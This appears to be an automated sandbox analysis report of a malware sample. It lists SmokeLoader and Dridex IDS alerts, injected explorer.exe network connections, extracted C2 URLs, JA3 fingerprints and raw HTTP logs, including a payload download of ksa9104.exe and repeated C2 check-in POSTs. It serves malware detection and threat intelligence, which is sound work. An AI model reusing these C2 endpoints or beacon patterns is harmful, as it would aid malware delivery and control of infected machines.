Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49750 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49761 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49761 -> 23.145.40.162:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 23.145.40.162 23.145.40.162

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: INTERNETGROUP-AS-BGBulgariaBG INTERNETGROUP-AS-BGBulgariaBG
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.8:49738

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://niarejwvgfav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://lkfxgtbclffake.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://fyhvuoiqukrfjpjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jmcgnnydyiyvfde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vjdyvxrsjwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://phwhrimonssxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://hqblemeoblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ffcibdqlkyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ywfvqxxvpvjvadf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://dbbwmiqkkpy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://gklmvitduapshup.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jefnxxqxuxib.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://npjscmvmupb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ipmfrunnoji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wwkvkysjcmxmifd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhwuphumqtqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkpgpviexggpuwvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrbmtindhjismyee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynepfbdxkuieepaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkxmfugtrnxonclj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymeegmcrvikfsv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnssdnlxskerq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vpprwqijyswgyjvy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ayjhmseqvvjye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bnqsjigsukajkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejrqbeuhiivimsok.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yanbtiwxewyyhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frpabbqmujgvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybeufjfqrbhah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://astksdjaitsnxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ssdmhljrxull.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mshenhcpddejse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjefvbuybfqlgx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fufaecmkeyed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://naauncqsbvtxnxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lcpcrwvedbvpllck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lgertcnwaskqpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fevqsrdkflt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drnpfojnpvggv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibetbbesaakqkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tyqfkmhoepxpii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wyjfuitjcdhsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecpjrwjcauix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bxntarqqdjdvdpxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blfmqjnqqyje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gieuyuggiqfgtm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eankyeljcevd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://luejdvwxxrcvrqdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://svfopofgftavf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bprjpwpsmmrgaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ocnxfkuqumobjmad.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxdhacbibrdlwrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlmsxhroxptelhd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hikneccvvrshgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:39:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:59 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:41:22 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 